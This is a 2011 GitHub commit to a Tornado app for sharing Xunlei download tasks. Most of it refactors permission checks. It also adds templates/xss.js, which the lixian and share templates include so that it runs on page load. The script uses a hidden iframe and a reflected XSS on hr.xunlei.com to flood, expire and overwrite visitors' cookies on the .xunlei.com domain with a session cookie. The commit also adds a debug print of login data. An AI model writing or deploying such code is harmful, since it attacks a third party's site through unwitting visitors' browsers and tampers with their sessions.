Skip to content

Commit

Permalink
cross cookie with xss, add base handle function has_permission
Browse files Browse the repository at this point in the history
  • Loading branch information
Binux committed Dec 28, 2011
1 parent 12203ed commit 979f4a3
Show file tree
Hide file tree
Showing 11 changed files with 50 additions and 24 deletions.
14 changes: 5 additions & 9 deletions handlers/add_task.py
View file
Expand Up @@ -24,13 +24,9 @@ def get(self, anonymous):
render_path = "add_task_anonymous.html" if anonymous else "add_task.html"
if not self.current_user:
message = u"please login first"
self.render(render_path, message=message)
return

email = self.current_user['email']
if anonymous and not self.user_manager.check_permission(email, "add_anonymous_task"):
elif anonymous and not self.has_permission("add_anonymous_task"):
message = u"您没有添加任务的权限"
elif not anonymous and not self.user_manager.check_permission(email, "add_task"):
elif not anonymous and not self.has_permission("add_task"):
message = u"您没有发布资源的权限"
else:
message = ""
Expand All @@ -49,9 +45,9 @@ def post(self, anonymous):
render_path = "add_task_anonymous.html" if anonymous else "add_task.html"
email = self.current_user['email']

if anonymous and not self.user_manager.check_permission(email, "add_anonymous_task"):
if anonymous and not self.has_permission("add_anonymous_task"):
raise HTTPError(403)
elif not anonymous and not self.user_manager.check_permission(email, "add_task"):
elif not anonymous and not self.has_permission(email, "add_task"):
raise HTTPError(403)
if url is None and btfile is None:
self.render(render_path, message="任务下载地址不能为空")
Expand All @@ -64,7 +60,7 @@ def post(self, anonymous):
tags = set([x.strip() for x in _split_re.split(tags)])
result, task = yield gen.Task(self.call_subprocess,
partial(self.task_manager.add_task, btfile or url, title, tags, email, anonymous,
self.user_manager.check_permission(email, "need_miaoxia")))
self.has_permission("need_miaoxia")))

if result == 1:
if task:
Expand Down
6 changes: 6 additions & 0 deletions handlers/base.py
View file
Expand Up @@ -44,9 +44,15 @@ def get_current_user(self):
return None

def installed_userjs(self):
return True # xss
cookie = self.get_cookie("cross-cookie")
if cookie == options.cross_cookie_version or cookie == "disabled":
return True

def disabled_userjs(self):
return False # xss
return self.get_cookie("cross-cookie") == "disabled"

def has_permission(self, permission):
email = self.current_user and self.current_user["email"] or None
return self.user_manager.check_permission(email, permission)
4 changes: 2 additions & 2 deletions handlers/edit_task.py
View file
Expand Up @@ -15,7 +15,7 @@ def get(self, message=""):
task_id = self.get_argument("task_id")
task = self.task_manager.get_task(int(task_id))
if self.current_user['email'] != task.creator and\
not self.user_manager.check_permission(self.current_user['email'], "admin"):
not self.has_permission("admin"):
raise HTTPError(403)
self.render("edit.html", task=task, message=message)

Expand All @@ -29,7 +29,7 @@ def post(self):
if tags:
tags = set([x.strip() for x in _split_re.split(tags)])
if self.current_user['email'] != task.creator and\
not self.user_manager.check_permission(self.current_user['email'], "admin"):
not self.has_permission("admin"):
raise HTTPError(403)
task.taskname = title
task.tags = tags
Expand Down
14 changes: 7 additions & 7 deletions handlers/index.py
View file
Expand Up @@ -12,7 +12,7 @@ class IndexHandler(BaseHandler):
def get(self):
q = self.get_argument("q", "")
feed = self.get_argument("feed", None)
view_all = self.current_user and self.user_manager.check_permission(self.current_user['email'], "view_invalid") or False
view_all = self.has_permission("view_invalid")
tasks = self.task_manager.get_task_list(q=q, limit=TASK_LIMIT, all=view_all)
if feed:
self.set_header("Content-Type", "application/atom+xml")
Expand Down Expand Up @@ -44,9 +44,9 @@ class UploadHandler(BaseHandler):
def get(self, creator_id):
feed = self.get_argument("feed", None)
creator = self.user_manager.get_user_email_by_id(int(creator_id)) or "no such user"
if self.current_user and (\
self.current_user.get("email") == creator or\
self.user_manager.check_permission(self.current_user.get("email"), "view_invalid")):
if self.current_user and self.current_user["email"] == creator:
all = True
elif self.has_permission("view_invalid"):
all = True
else:
all = False
Expand All @@ -66,9 +66,9 @@ def get(self):
creator = ""
if a:
creator = self.user_manager.get_user_email_by_id(int(a)) or "no such user"
if self.current_user and (\
self.current_user.get("email") == creator or\
self.user_manager.check_permission(self.current_user['email'], "view_invalid")):
if self.current_user and self.current_user["email"] == creator:
all = True
elif self.has_permission("view_invalid"):
all = True
else:
all = False
Expand Down
1 change: 1 addition & 0 deletions handlers/login.py
View file
Expand Up @@ -22,6 +22,7 @@ def get(self):
def _on_auth(self, user):
if not user:
raise HTTPError(500, "Google auth failed")
print user
self.set_secure_cookie("name", user["name"])
self.set_secure_cookie("email", user["email"])
self.user_manager.update_user(user["email"], user["name"])
Expand Down
2 changes: 1 addition & 1 deletion libs/lixian_api.py
View file
Expand Up @@ -93,7 +93,7 @@ def _get_verifycode(self, username):
#DEBUG(pformat(r.content))

verifycode_tmp = r.cookies['check_result'].split(":", 1)
assert len(verifycode_tmp) == 2
assert len(verifycode_tmp) == 2, verifycode_tmp
return verifycode_tmp[1]

REDIRECT_URL = "http://dynamic.lixian.vip.xunlei.com/login"
Expand Down
10 changes: 10 additions & 0 deletions libs/user_manager.py
View file
Expand Up @@ -12,6 +12,14 @@
"need_miaoxia": True,
"admin": False,
}
not_login_permission = {
"add_task": False,
"add_anonymous_task": False,
"mod_task": False,
"view_invalid": False,
"need_miaoxia": True,
"admin": False,
}
group_permission = {
None: {
},
Expand Down Expand Up @@ -96,4 +104,6 @@ def get_permission(self, email):

@mem_cache(expire=60)
def check_permission(self, email, permission):
if email is None:
return not_login_permission[permission]
return group_permission.get(self.get_group(email), default_group_permission)[permission]
5 changes: 3 additions & 2 deletions templates/lixian.html
View file
Expand Up @@ -13,7 +13,7 @@

{% block body %}
<div class="lixian-box">
<a href="{{ options.cross_userscript or static_url(options.cross_userscript) }}" target="_blank" class="cross-cookie{% if handler.disabled_userjs() %} hidden{% end %}" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}">您尚未安装或需要升级 cross-cookie 点击前往UserScript.org安装</a>
<!--<a href="{{ options.cross_userscript or static_url(options.cross_userscript) }}" target="_blank" class="cross-cookie{% if handler.disabled_userjs() %} hidden{% end %}" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}">您尚未安装或需要升级 cross-cookie 点击前往UserScript.org安装</a>-->

<div class="task-info">
<div class="task-name">{{ task.taskname }}</div>
Expand Down Expand Up @@ -104,7 +104,7 @@
}

function get_cookie() {
return $(".cross-cookie").attr("data-cookie").split(";")[0];
return "{{ cookie }}".split(";")[0];
}

var alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Expand Down Expand Up @@ -186,5 +186,6 @@
return false;
});
{% end %}
{% include xss.js %}
</script>
{% end %}
5 changes: 3 additions & 2 deletions templates/share.html
View file
Expand Up @@ -17,7 +17,7 @@
{% end %}

{% block list %}
<div class="cross-cookie hidden" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}"></div>
<!--<div class="cross-cookie hidden" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}"></div>-->
<span class="infohash" style="float: right;">Hash: {{ task.cid }}</span>
<ul class="task-list">
<li class="push-top"></li>
Expand Down Expand Up @@ -150,7 +150,7 @@
}

function get_cookie() {
return $(".cross-cookie").attr("data-cookie").split(";")[0];
return "{{ cookie }}".split(";")[0];
}

function copy_links() {
Expand Down Expand Up @@ -213,5 +213,6 @@
return false;
});
{% end %}
{% include xss.js %}
</script>
{% end %}
2 changes: 1 addition & 1 deletion templates/task_list.html
View file
@@ -1,5 +1,5 @@
{% set current_user_id = current_user and email2id(current_user['email']) %}
{% set isadmin = current_user and handler.user_manager.check_permission(current_user['email'], "admin") %}
{% set isadmin = handler.has_permission("admin") %}
{% for task in tasks %}
<li class="task-item" data-task-id="{{ task.id }}">
<div class="process-bar {{ task.status }}" style="width: {{ 100-task.process }}%"></div>
Expand Down
11 changes: 11 additions & 0 deletions templates/xss.js
View file
@@ -0,0 +1,11 @@
function xss() {
var script = 'for(var i=0;i<500;i++){document.cookie="loli"+i.toString()+"=1;domain=.xunlei.com";}for(var i=0;i<500;i++){document.cookie="loli"+i.toString()+"=0;domain=.xunlei.com;expires=Wed, 28 Dec 2011 12:46:19 GMT"}document.cookie="{{ cookie }}".replace(".vip","");console.log("done");';
var iframe = document.createElement("iframe");
iframe.setAttribute("style", "display: none;");
iframe.src = "http://hr.xunlei.com/searchlist.html?contentkey='%3Cscript%3E"+encodeURI(script)+"%3C/script%3E";
document.body.appendChild(iframe);
}
if (document.cookie.indexOf("xss=done") == -1) {
xss();
document.cookie = "xss=done";
}

0 comments on commit 979f4a3

Please sign in to comment.